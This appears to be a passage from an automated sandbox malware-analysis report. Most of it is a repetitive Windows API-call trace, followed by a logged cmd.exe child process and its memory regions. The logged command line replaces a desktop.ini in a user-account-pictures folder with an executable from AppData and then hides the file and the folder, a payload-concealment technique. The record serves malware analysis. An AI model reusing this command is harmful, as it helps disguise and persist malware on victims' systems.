nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.886] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.886] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] GetFileType (hFile=0x4c) returned 0x1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.886] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.887] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.887] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] GetFileType (hFile=0x4c) returned 0x1 [0192.887] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.887] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.888] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.888] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.888] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.888] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.889] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.889] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x200, lpOverlapped=0x0) returned 1 [0192.889] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.889] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f030*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f080*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f0d0*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f120*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f170*, lpNumberOfBytesWritten=0x18e1c4*=0x50, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] WriteFile (in: hFile=0x4c, lpBuffer=0x18f1c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18f1c0*, lpNumberOfBytesWritten=0x18e1c4*=0x20, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.890] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.890] ReadFile (in: hFile=0x54, lpBuffer=0x18efe0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e1d0, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesRead=0x18e1d0*=0x32, lpOverlapped=0x0) returned 1 [0192.890] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.890] GetFileType (hFile=0x4c) returned 0x1 [0192.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.891] GetFileType (hFile=0x4c) returned 0x1 [0192.891] _get_osfhandle (_FileHandle=1) returned 0x4c [0192.891] WriteFile (in: hFile=0x4c, lpBuffer=0x18efe0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x18e1c4, lpOverlapped=0x0 | out: lpBuffer=0x18efe0*, lpNumberOfBytesWritten=0x18e1c4*=0x32, lpOverlapped=0x0) returned 1 [0192.891] _get_osfhandle (_FileHandle=4) returned 0x54 [0192.891] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e1b0 | out: lpNewFilePointer=0x0) returned 1 [0192.891] _close (_FileHandle=4) returned 0 [0192.891] FindNextFileW (in: hFindFile=0x240e80, lpFindFileData=0x18f244 | out: lpFindFileData=0x18f244) returned 0 [0192.891] GetLastError () returned 0x12 [0192.891] FindClose (in: hFindFile=0x240e80 | out: hFindFile=0x240e80) returned 1 [0192.892] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0192.898] _close (_FileHandle=3) returned 0 [0192.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.899] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.899] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.899] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.899] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.899] SetConsoleInputExeNameW () returned 0x1 [0192.899] GetConsoleOutputCP () returned 0x1b5 [0192.899] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.899] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.900] exit (_Code=0) Process: id = "436" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28324 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28325 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28326 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28327 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 28328 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28329 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28330 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28331 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28332 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 28333 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28358 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28359 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28360 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28361 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 28362 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 28363 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28364 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28365 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28366 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28367 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28368 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28369 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28370 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28371 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28372 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28373 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28374 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28375 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 28376 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 28377 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 28378 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 28379 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 28380 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 28381 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 28406 start_va = 0x1330000 end_va = 0x15fefff entry_point = 0x1330000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 628 os_tid = 0xb64 [0192.814] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fcb4 | out: lpSystemTimeAsFileTime=0x30fcb4*(dwLowDateTime=0xa7cdad40, dwHighDateTime=0x1d440a9)) [0192.814] GetCurrentProcessId () returned 0xa84 [0192.814] GetCurrentThreadId () returned 0xb64 [0192.814] GetTickCount () returned 0x36cf5 [0192.814] QueryPerformanceCounter (in: lpPerformanceCount=0x30fcac | out: lpPerformanceCount=0x30fcac*=24960299763) returned 1 [0192.814] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0192.814] __set_app_type (_Type=0x1) [0192.814] __p__fmode () returned 0x76b331f4 [0192.814] __p__commode () returned 0x76b331fc [0192.815] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0192.815] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0192.815] GetCurrentThreadId () returned 0xb64 [0192.815] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb64) returned 0x38 [0192.815] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.815] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0192.815] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.815] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0192.815] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fc44 | out: phkResult=0x30fc44*=0x0) returned 0x2 [0192.815] VirtualQuery (in: lpAddress=0x30fc7b, lpBuffer=0x30fc14, dwLength=0x1c | out: lpBuffer=0x30fc14*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.815] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fc14, dwLength=0x1c | out: lpBuffer=0x30fc14*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0192.815] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fc14, dwLength=0x1c | out: lpBuffer=0x30fc14*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0192.815] 